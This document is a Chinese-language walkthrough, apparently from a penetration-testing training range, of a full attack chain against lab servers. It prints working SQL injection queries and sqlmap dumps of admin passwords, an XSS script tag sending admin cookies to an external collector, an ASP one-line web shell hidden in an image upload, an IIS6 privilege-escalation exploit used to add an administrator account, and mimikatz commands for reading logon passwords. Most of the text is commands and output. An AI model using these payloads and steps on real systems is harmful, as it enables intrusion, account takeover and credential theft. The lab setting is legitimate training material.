赞
踩
?id=1’
未正常显示
?id=1 and 1=1
?id=1 and 1=2
页面回显不正常,存在int型注入
?id=1 and 1=1 order by 1
?id=1 and 1=1 order by 2
?id=1 and 1=1 order by 3
?id=1 order by 1
?id=1 order by 2
?id=1 order by 3
3回显错误,字段数为2
?id=1 and 1=2 union select 1,2
?id=1 and 1=2 union select 1,version()
5.5.53
?id=1 and 1=2 union select 1,database()
maoshe
数据库
?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1
admin
查字段
?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name=‘admin’ limit 0,1
Id
?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 1,1
username
?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 2,1
password
?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 3,1
无,查出 admin 表里 有 id username password 三个字段
查字段内容
?id=1 and 1=2 union select 1,username from admin limit 0,1
admin
?id=1 and 1=2 union select 1,username from admin limit 1,1
ppt领取微信
?id=1 and 1=2 union select 1,password from admin limit 0,1
hellohack
这就是flag
?id=1 and 1=2 union select 1,password from admin limit 1,1
zkaqbanban
两个用户对两个密码
直观一点做法
?id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
admin,dirs,news,xss
?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'
Id,username,password
?id=1 and 1=2 union select 1,
group_concat(id,username,password) from admin
1adminhellohack,2ppt领取微信zkaqbanban
?id=1 and 1=2 union select 1,
group_concat(id,0x40,username,0x3a,password) from admin
1@admin:hellohack,2@ppt领取微信:zkaqbanban
到这里其实已经可以结束了
?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='dirs'
paths
?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='news'
id,content
?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='xss'
id,user,pass
playload:
python sqlmap.py http://59.63.200.79:8003/?id=1
python sqlmap.py http://59.63.200.79:8003/?id=1 --dbs
python sqlmap.py http://59.63.200.79:8003/?id=1 -D maoshe --tables
python sqlmap.py http://59.63.200.79:8003/?id=1 -D maoshe -T admin --columns
python sqlmap.py http://59.63.200.79:8003/?id=1 -D maoshe -T admin -C username,password --dump
完整流程:
C:\Python27\sqlmap>python sqlmap.py http://59.63.200.79:8003/?id=1 ___ __H__ ___ ___[']_____ ___ ___ {1.4.8.10#dev} |_ -| . [(] | .'| . | |___|_ ["]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 17:18:23 /2020-08-16/ [17:18:26] [INFO] resuming back-end DBMS 'mysql' [17:18:26] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 2945=2945 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1 AND (SELECT 8155 FROM (SELECT(SLEEP(5)))osRC) --- [17:18:26] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 [17:18:26] [INFO] fetched data logged to text files under 'C:\Users\Nah\AppData\Local\sqlmap\output\59.63.200.79' [*] ending @ 17:18:26 /2020-08-16/ C:\Python27\sqlmap>python sqlmap.py http://59.63.200.79:8003/?id=1 --dbs ___ __H__ ___ ___[)]_____ ___ ___ {1.4.8.10#dev} |_ -| . ['] | .'| . | |___|_ [']_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 17:21:36 /2020-08-16/ [17:21:36] [INFO] resuming back-end DBMS 'mysql' [17:21:36] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 2945=2945 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1 AND (SELECT 8155 FROM (SELECT(SLEEP(5)))osRC) --- [17:21:37] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 [17:21:37] [INFO] fetching database names [17:21:37] [INFO] fetching number of databases [17:21:37] [INFO] resumed: 3 [17:21:37] [INFO] resumed: information_schema [17:21:37] [INFO] resumed: maoshe [17:21:37] [INFO] resumed: test available databases [3]: [*] information_schema [*] maoshe [*] test [17:21:37] [INFO] fetched data logged to text files under 'C:\Users\Nah\AppData\Local\sqlmap\output\59.63.200.79' [*] ending @ 17:21:37 /2020-08-16/ C:\Python27\sqlmap>python sqlmap.py http://59.63.200.79:8003/?id=1 -D maoshe --tables ___ __H__ ___ ___[)]_____ ___ ___ {1.4.8.10#dev} |_ -| . ['] | .'| . | |___|_ [)]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 17:21:55 /2020-08-16/ [17:21:55] [INFO] resuming back-end DBMS 'mysql' [17:21:55] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 2945=2945 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1 AND (SELECT 8155 FROM (SELECT(SLEEP(5)))osRC) --- [17:21:56] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 [17:21:56] [INFO] fetching tables for database: 'maoshe' [17:21:56] [INFO] fetching number of tables for database 'maoshe' [17:21:56] [INFO] resumed: 4 [17:21:56] [INFO] resumed: admin [17:21:56] [INFO] resumed: dirs [17:21:56] [INFO] resumed: news [17:21:56] [INFO] resumed: xss Database: maoshe [4 tables] +-------+ | admin | | dirs | | news | | xss | +-------+ [17:21:56] [INFO] fetched data logged to text files under 'C:\Users\Nah\AppData\Local\sqlmap\output\59.63.200.79' [*] ending @ 17:21:56 /2020-08-16/ C:\Python27\sqlmap>python sqlmap.py http://59.63.200.79:8003/?id=1 -D maoshe -T admin --columns ___ __H__ ___ ___[(]_____ ___ ___ {1.4.8.10#dev} |_ -| . [.] | .'| . | |___|_ ["]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 17:22:39 /2020-08-16/ [17:22:39] [INFO] resuming back-end DBMS 'mysql' [17:22:39] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 2945=2945 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1 AND (SELECT 8155 FROM (SELECT(SLEEP(5)))osRC) --- [17:22:39] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 [17:22:39] [INFO] fetching columns for table 'admin' in database 'maoshe' [17:22:39] [INFO] resumed: 3 [17:22:39] [INFO] resumed: Id [17:22:39] [INFO] resumed: int(11) [17:22:39] [INFO] resumed: username [17:22:39] [INFO] resumed: varchar(11) [17:22:39] [INFO] resumed: password [17:22:39] [INFO] resumed: varchar(11) Database: maoshe Table: admin [3 columns] +----------+-------------+ | Column | Type | +----------+-------------+ | Id | int(11) | | password | varchar(11) | | username | varchar(11) | +----------+-------------+ [17:22:39] [INFO] fetched data logged to text files under 'C:\Users\Nah\AppData\Local\sqlmap\output\59.63.200.79' [*] ending @ 17:22:39 /2020-08-16/ C:\Python27\sqlmap>python sqlmap.py http://59.63.200.79:8003/?id=1 -D maoshe -T admin -C username,password --dump ___ __H__ ___ ___[.]_____ ___ ___ {1.4.8.10#dev} |_ -| . [,] | .'| . | |___|_ [.]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 17:23:43 /2020-08-16/ [17:23:43] [INFO] resuming back-end DBMS 'mysql' [17:23:43] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 2945=2945 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1 AND (SELECT 8155 FROM (SELECT(SLEEP(5)))osRC) --- [17:23:43] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 [17:23:43] [INFO] fetching entries of column(s) 'password, username' for table 'admin' in database 'maoshe' [17:23:43] [INFO] fetching number of column(s) 'password, username' entries for table 'admin' in database 'maoshe' [17:23:43] [INFO] resumed: 2 [17:23:43] [INFO] resumed: hellohack [17:23:43] [INFO] resumed: admin [17:23:43] [INFO] resumed: zkaqbanban [17:23:43] [INFO] resumed: ppt领取微信 Database: maoshe Table: admin [2 entries] +----------+------------+ | username | password | +----------+------------+ | admin | hellohack | | ppt领取微信 | zkaqbanban | +----------+------------+ [17:23:43] [INFO] table 'maoshe.admin' dumped to CSV file 'C:\Users\Nah\AppData\Local\sqlmap\output\59.63.200.79\dump\maoshe\admin.csv' [17:23:43] [INFO] fetched data logged to text files under 'C:\Users\Nah\AppData\Local\sqlmap\output\59.63.200.79' [*] ending @ 17:23:43 /2020-08-16/
?id=171
?id=171 order by 10
//11 (x)
id=171 union select 1,2,3,4,5,6,7,8,9,10 from admin
//waf
id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin
+代替空格
回显了2、3、7、8、9
Admin表存在,也必须加,否则报错
id=171+union+select+1,username,password,4,5,6,7,8,9,10+from+admin
账户admin
密码b9a2a2b5dffb918c
密码md5解密后welcome
登陆后台/admin
zkz{welcome-control}
http://59.63.200.79:8004/admin/default.asp
http://59.63.200.79:8004/admin123/
对不起,为了系统安全,不允许从外部链接地址访问本系统的后台管理页面。
访问者的Curl(host)为:
http://59.63.200.79:81/admin123/sysadmin_view.asp
访问者的Comeurl(referer)为:
http://59.63.200.79:8004/admin123/
刷新页面,抓到4个包,最后一个包是我们需要的
端口号都改为81
render
zkz{fuzz-666}
http://59.63.200.79:8003/dami_zhifu/dami_baopo/index.php
http://59.63.200.79:8003/dami_zhifu/dami_baopo/admin.php
常见用户名没有或被禁用
猜用户名zkaq,对的
bp抓包爆破密码,看长度
账户密码都是zkaq
flag{s_q_gjrm}
https://xsspt.com/index.php?do=login
<script src = https://xsspt.com/nxqPZY?1597410463> </ script>
cookie : ASPSESSIONIDSQDARATQ=KJFAFKEDEAPPFBEDHJFCIGIC;
flag=zkz{xsser-g00d},ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC
zkz{xsser-g00d}
提示:
1,通过修改Cookie登录后台(没用重打)2,上传SHELL!3,Flag在网站根目录(flag.php)3.上传图片时建议上传小文件,我建议用QQ表情
尤里通过XSS终于得到了管理员Cookie,在修改了cookie后尤里直接绕过了登录密码,
看到了后台功能!然后要做的,就是找一个上传点,上传自己的外壳了!
之前bp抓包得cookie也行
ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC
放入cookie
Chrome
Firefox
单击准备好了吗
Microsoft-IIS/6.0
可能存在IIS解析漏洞:
- 目录解析 以*.asp命名的文件夹里的文件都将会被当成ASP文件执行。
- 文件解析 对于 *.asp;.jpg 像这种畸形文件名在";"后面的直接被忽略,也就是说当成 *.asp文件执行。
- IIS6.0 默认的可执行文件除了asp还包含这三种 *.asa *.cer *.cdx
查看上传目录,和上传文件限制
确定上传目录
其他地方也是这样,提示没有填说明
正确上传点
asp.php
<%eval request ("a")%>
做图片马
copy 1.php + 1.png 2.png
大了好像不行,用了这个小的表情包 ,改文件名为1.cer
萌不萌???
修改文件名为1.cer上传
很难受,一开始找上传的文件在哪,到底是什么文件名。一晚上上传不了,开始没点上传,后来是做的图片马不能上传
重做了新的,上传成功
复制给的上传名,就是带你上传真实时间的那个
zkz{G3t_the_admin!Sh3ll}
提示:
1,提权!
2,FLAG在C盘根目录下!
尤里嘿嘿笑了起来,简单的Win2003的,只要拿到SYSTEM权限,他就可以向女神小芳炫技去了…
传送门
C
蚁剑虚拟终端没有成功,一直拒绝访问
换了正版的菜刀,选asp,GB2312
刚连上出现的命令
netstat -an | find "ESTABLISHED"
一上来whoami
发生系统错误 5。
拒绝访问。
未提权的虚拟终端
whoami
nt authority\network service
接着要做的是
net user username password /add
此时权限不够
因为cmd需要用到外部接口wscript.shell。
但wscript.shell在C盘,C盘我们仍然无法访问。使用已经组装好的wscript.shell,也就是iis6.exe。
提权命令流程
iis6.exe "whoami"
//this exploit gives you a local system shell 给了system的命令行权限
iis6.exe "whoami"
//再次确认身份和权限
iis6.exe "net user 1 1 /add"
//添加的用户 (账户1 密码1) 其实是在普通用户组中
iis6.exe "net user 1"
//查看用户信息
iis6.exe "net localgroup Administrators 1 /add"
//添加用户到管理员组
tasklist -svc //找到远程桌面服务termservice 即 svchost.exe 2444 TermService 的PID
netstat -ano //通过上面的PID找到端口号
用Windows自带远程桌面连接,访问主机,带上端口号:ip+port。
远程桌面是一个程序,占用了一个端口号。这个端口号其实就是服务软件的端口号,ip表示的是这台服务器电脑,如果想和服务器上的远程桌面服务进行对接,那么肯定要把端口号换成它占用的的端口号
可以直接win+r连
mstsc /v:IP:PORT
或者传统方法
搞错了,再来
其实这里可以上传文件
从右下角回收站打开我的脑子
拿到SYSTEM之后,尤里并不满足,他准备通过某种方式拿到服务器管理员密码,用来收集密码信息,以便其他方向的渗透,顺便想将密码发给小芳,用以炫技。
却不曾想,当尤里看到系统的明文密码后。。大吃一惊。。。自此,尤里的人生掀开了新的篇章
文件右键属性,安全,高级,有5行,选择拒绝的两行,编辑,全部清除
密码获取工具mimikatz,直接搜索
privilege::debuug ----提升权限
sekurlsa::logonPasswords----获取登陆用户密码
提权
privilege::debug
获取登陆用户密码
sekurlsa::logonPasswords
系统似乎被改了?
解压包密码就是!!!
(我搞了好久好久)
wow!yougotit!
zkz{F3ck_power_3y3stem}
具体的实现过程
D:\05\UploadFiles\> iis6.exe "whoami" [IIS6Up]-->IIS Token PipeAdmin golds7n Version [IIS6Up]-->This exploit gives you a Local System shell [IIS6Up]-->Set registry OK [process walking]: 2192 wmiprvse.exe [IIS6Up]-->Got WMI process Pid: 2192 [Try 1 time...] [Try 2 time...] [IIS6Up]-->Found token SYSTEM [*]Running command with SYSTEM Token... [*]Command: whoami [+]Done, command should have ran as SYSTEM! nt authority\system D:\05\UploadFiles\> iis6.exe "whoami" [IIS6Up]-->IIS Token PipeAdmin golds7n Version [IIS6Up]-->This exploit gives you a Local System shell [IIS6Up]-->Set registry OK [process walking]: 2192 wmiprvse.exe [IIS6Up]-->Got WMI process Pid: 2192 [Try 1 time...] [IIS6Up]-->Found token SYSTEM [*]Running command with SYSTEM Token... [*]Command: whoami [+]Done, command should have ran as SYSTEM! nt authority\system D:\05\UploadFiles\> iis6.exe "net user 1 1 /add" [IIS6Up]-->IIS Token PipeAdmin golds7n Version [IIS6Up]-->This exploit gives you a Local System shell [IIS6Up]-->Set registry OK [process walking]: 2192 wmiprvse.exe [IIS6Up]-->Got WMI process Pid: 2192 [Try 1 time...] [IIS6Up]-->Found token SYSTEM [*]Running command with SYSTEM Token... [*]Command: net user 1 1 /add [+]Done, command should have ran as SYSTEM! 命令成功完成。 D:\05\UploadFiles\> iis6.exe "net user 1" [IIS6Up]-->IIS Token PipeAdmin golds7n Version [IIS6Up]-->This exploit gives you a Local System shell [IIS6Up]-->Set registry OK [process walking]: 2192 wmiprvse.exe [IIS6Up]-->Got WMI process Pid: 2192 [Try 1 time...] [IIS6Up]-->Found token SYSTEM [*]Running command with SYSTEM Token... [*]Command: net user 1 [+]Done, command should have ran as SYSTEM! 用户名 1 全名 注释 用户的注释 国家(地区)代码 000 (系统默认值) 帐户启用 Yes 帐户到期 从不 上次设置密码 2020-8-16 1:57 密码到期 2020-9-28 0:44 密码可更改 2020-8-16 1:57 需要密码 Yes 用户可以更改密码 Yes 允许的工作站 All 登录脚本 用户配置文件 主目录 上次登录 从不 可允许的登录小时数 All 本地组成员 *Users 全局组成员 *None 命令成功完成。 D:\05\UploadFiles\> iis6.exe "net localgroup Administrators 1 /add" [IIS6Up]-->IIS Token PipeAdmin golds7n Version [IIS6Up]-->This exploit gives you a Local System shell [IIS6Up]-->Set registry OK [process walking]: 2192 wmiprvse.exe [IIS6Up]-->Got WMI process Pid: 2192 [Try 1 time...] [IIS6Up]-->Found token SYSTEM [*]Running command with SYSTEM Token... [*]Command: net localgroup Administrators 1 /add [+]Done, command should have ran as SYSTEM! 命令成功完成。 D:\05\UploadFiles\> iis6.exe "net user 1" [IIS6Up]-->IIS Token PipeAdmin golds7n Version [IIS6Up]-->This exploit gives you a Local System shell [IIS6Up]-->Set registry OK [process walking]: 876 wmiprvse.exe [IIS6Up]-->Got WMI process Pid: 876 [Try 1 time...] [Try 2 time...] [Try 3 time...] [Try 4 time...] D:\05\UploadFiles\> iis6.exe "net user 1" [IIS6Up]-->IIS Token PipeAdmin golds7n Version [IIS6Up]-->This exploit gives you a Local System shell [IIS6Up]-->Set registry OK [process walking]: 876 wmiprvse.exe [IIS6Up]-->Got WMI process Pid: 876 [Try 1 time...] [IIS6Up]-->Found token SYSTEM [*]Running command with SYSTEM Token... [*]Command: net user 1 [+]Done, command should have ran as SYSTEM! 用户名 1 全名 注释 用户的注释 国家(地区)代码 000 (系统默认值) 帐户启用 Yes 帐户到期 从不 上次设置密码 2020-8-16 1:57 密码到期 2020-9-28 0:44 密码可更改 2020-8-16 1:57 需要密码 Yes 用户可以更改密码 Yes 允许的工作站 All 登录脚本 用户配置文件 主目录 上次登录 从不 可允许的登录小时数 All 本地组成员 *Administrators *Users 全局组成员 *None 命令成功完成。 D:\05\UploadFiles\> tasklist -svc 映像名称 PID 服务 ========================= ======== ============================================ System Idle Process 0 暂缺 System 4 暂缺 smss.exe 284 暂缺 csrss.exe 332 暂缺 winlogon.exe 356 暂缺 services.exe 404 Eventlog, PlugPlay lsass.exe 416 HTTPFilter, PolicyAgent, ProtectedStorage, SamSs svchost.exe 608 DcomLaunch svchost.exe 672 RpcSs svchost.exe 728 Dhcp, Dnscache svchost.exe 756 LmHosts, W32Time svchost.exe 792 AeLookupSvc, Browser, CryptSvc, dmserver, EventSystem, helpsvc, lanmanserver, lanmanworkstation, Netman, Schedule, seclogon, SENS, ShellHWDetection, TrkWks, winmgmt, wuauserv, WZCSVC spoolsv.exe 952 Spooler msdtc.exe 980 MSDTC httpd.exe 1112 Apache2a svchost.exe 1144 ERSvc inetinfo.exe 1200 IISADMIN mysqld.exe 1256 MySQLa svchost.exe 1960 RemoteRegistry VGAuthService.exe 2020 VGAuthService vmtoolsd.exe 2064 VMTools svchost.exe 2324 W3SVC svchost.exe 2444 TermService dllhost.exe 2524 COMSysApp w3wp.exe 2900 暂缺 wmiprvse.exe 3388 暂缺 logon.scr 3256 暂缺 httpd.exe 852 暂缺 wmiprvse.exe 876 暂缺 cmd.exe 1756 暂缺 tasklist.exe 1744 暂缺 D:\05\UploadFiles\> netstat -ano Active Connections Proto Local Address Foreign Address State PID TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 1112 TCP 0.0.0.0:81 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:82 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 672 TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING 416 TCP 0.0.0.0:1026 0.0.0.0:0 LISTENING 980 TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING 1256 TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 2444 TCP 0.0.0.0:8021 0.0.0.0:0 LISTENING 1112 TCP 127.0.0.1:3306 127.0.0.1:4274 TIME_WAIT 0 TCP 192.168.0.3:82 112.32.5.107:31515 ESTABLISHED 4 TCP 192.168.0.3:139 0.0.0.0:0 LISTENING 4 UDP 0.0.0.0:445 *:* 4 UDP 0.0.0.0:500 *:* 416 UDP 0.0.0.0:1333 *:* 728 UDP 0.0.0.0:4500 *:* 416 UDP 127.0.0.1:123 *:* 756 UDP 192.168.0.3:123 *:* 756 UDP 192.168.0.3:137 *:* 4 UDP 192.168.0.3:138 *:* 4
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。